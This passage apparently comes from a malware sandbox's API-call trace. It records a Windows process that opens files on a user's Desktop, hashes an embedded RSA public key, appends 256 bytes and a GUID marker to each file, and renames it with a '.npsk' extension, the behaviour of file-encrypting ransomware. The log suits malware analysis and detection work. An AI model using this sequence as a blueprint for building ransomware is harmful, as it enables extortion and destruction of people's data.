dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0214.774] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=94383) returned 1 [0214.774] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0214.776] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x17089, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0214.776] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0214.777] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x170af, lpOverlapped=0x0) returned 1 [0214.777] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0214.777] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0214.777] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0214.777] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1d70) returned 1 [0214.778] CryptCreateHash (in: hProv=0x7b1d70, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0214.778] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0214.778] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0214.778] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0214.778] GetLastError () returned 0x0 [0214.779] CryptDestroyHash (hHash=0x3277d68) returned 1 [0214.779] CryptReleaseContext (hProv=0x7b1d70, dwFlags=0x0) returned 1 [0214.779] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7a79b8 | out: hHeap=0x750000) returned 1 [0214.779] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0214.779] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0214.779] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0214.779] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0214.779] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0214.782] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x170af, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0214.782] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0214.782] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3217e98 | out: hHeap=0x750000) returned 1 [0214.782] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0214.782] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0214.782] CloseHandle (hObject=0x61c) returned 1 [0214.783] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\G0G1KclC.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\g0g1kclc.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\G0G1KclC.gif.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\g0g1kclc.gif.npsk")) returned 1 [0214.785] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a8ff88 | out: hHeap=0x750000) returned 1 [0214.785] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0214.785] VirtualFree (lpAddress=0x3810000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0214.786] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7bce58 | out: hHeap=0x750000) returned 1 [0214.786] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x600bb10, ftCreationTime.dwHighDateTime=0x1d5df95, ftLastAccessTime.dwLowDateTime=0x7d2629b0, ftLastAccessTime.dwHighDateTime=0x1d5dc38, ftLastWriteTime.dwLowDateTime=0x7d2629b0, ftLastWriteTime.dwHighDateTime=0x1d5dc38, nFileSizeHigh=0x0, nFileSizeLow=0xe07b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="g5opRQjJX413jOn 4aTe.doc", cAlternateFileName="G5OPRQ~1.DOC")) returned 1 [0214.786] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\g5opRQjJX413jOn 4aTe.doc") returned=".doc" [0214.786] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\g5opRQjJX413jOn 4aTe.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\g5oprqjjx413jon 4ate.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0214.786] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=57467) returned 1 [0214.786] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0214.788] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xe055, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0214.788] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0214.790] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0xe07b, lpOverlapped=0x0) returned 1 [0214.790] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0214.791] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0214.791] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0214.791] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b20a0) returned 1 [0214.791] CryptCreateHash (in: hProv=0x7b20a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0214.791] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0214.791] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0214.792] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0214.792] GetLastError () returned 0x0 [0214.792] CryptDestroyHash (hHash=0x3277d68) returned 1 [0214.792] CryptReleaseContext (hProv=0x7b20a0, dwFlags=0x0) returned 1 [0214.792] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7a79b8 | out: hHeap=0x750000) returned 1 [0214.792] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0214.792] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0214.792] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0214.792] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0214.792] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0214.793] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xe07b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0214.793] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0214.793] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3217e98 | out: hHeap=0x750000) returned 1 [0214.793] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0214.793] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0214.793] CloseHandle (hObject=0x61c) returned 1 [0214.794] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\g5opRQjJX413jOn 4aTe.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\g5oprqjjx413jon 4ate.doc"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\g5opRQjJX413jOn 4aTe.doc.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\g5oprqjjx413jon 4ate.doc.npsk")) returned 1 [0214.799] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a8ff88 | out: hHeap=0x750000) returned 1 [0214.799] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0214.799] VirtualFree (lpAddress=0x3810000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0214.800] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7b1d70 | out: hHeap=0x750000) returned 1 [0214.800] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb599d3c0, ftCreationTime.dwHighDateTime=0x1d5e6a4, ftLastAccessTime.dwLowDateTime=0x88696b10, ftLastAccessTime.dwHighDateTime=0x1d5e1e8, ftLastWriteTime.dwLowDateTime=0x88696b10, ftLastWriteTime.dwHighDateTime=0x1d5e1e8, nFileSizeHigh=0x0, nFileSizeLow=0x51d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="I0lC-Z.m4a", cAlternateFileName="")) returned 1 [0214.800] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\I0lC-Z.m4a") returned=".m4a" [0214.800] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\I0lC-Z.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\i0lc-z.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0214.801] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=20948) returned 1 [0214.801] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0214.803] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x51ae, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0214.803] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0214.804] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x51d4, lpOverlapped=0x0) returned 1 [0214.805] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0214.805] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0214.805] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0214.805] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1d70) returned 1 [0214.807] CryptCreateHash (in: hProv=0x7b1d70, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0214.807] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0214.807] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0214.807] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0214.807] GetLastError () returned 0x0 [0214.807] CryptDestroyHash (hHash=0x3277d68) returned 1 [0214.807] CryptReleaseContext (hProv=0x7b1d70, dwFlags=0x0) returned 1 [0214.807] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7a79b8 | out: hHeap=0x750000) returned 1 [0214.807] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0214.807] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0214.807] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0214.807] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0214.807] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0214.808] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x51d4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0214.808] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0214.808] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3217e98 | out: hHeap=0x750000) returned 1 [0214.808] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0214.808] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0214.808] CloseHandle (hObject=0x61c) returned 1 [0214.810] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\I0lC-Z.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\i0lc-z.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\I0lC-Z.m4a.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\i0lc-z.m4a.npsk")) returned 1 [0214.811] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a8ff88 | out: hHeap=0x750000) returned 1 [0214.811] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0214.811] VirtualFree (lpAddress=0x3810000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0214.812] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7bce58 | out: hHeap=0x750000) returned 1 [0214.812] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x252bc420, ftCreationTime.dwHighDateTime=0x1d5e7c0, ftLastAccessTime.dwLowDateTime=0xbf702e50, ftLastAccessTime.dwHighDateTime=0x1d5dba3, ftLastWriteTime.dwLowDateTime=0xbf702e50, ftLastWriteTime.dwHighDateTime=0x1d5dba3, nFileSizeHigh=0x0, nFileSizeLow=0x590f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="inZlLm7e4IeFfAl.jpg", cAlternateFileName="INZLLM~1.JPG")) returned 1 [0214.812] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\inZlLm7e4IeFfAl.jpg") returned=".jpg" [0214.812] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\inZlLm7e4IeFfAl.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\inzllm7e4ieffal.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0214.812] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=22799) returned 1 [0214.812] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0214.814] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x58e9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0214.814] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0214.815] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x590f, lpOverlapped=0x0) returned 1 [0214.816] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0214.816] lstrlenA (lpString="-----BEGIN PUBLIC 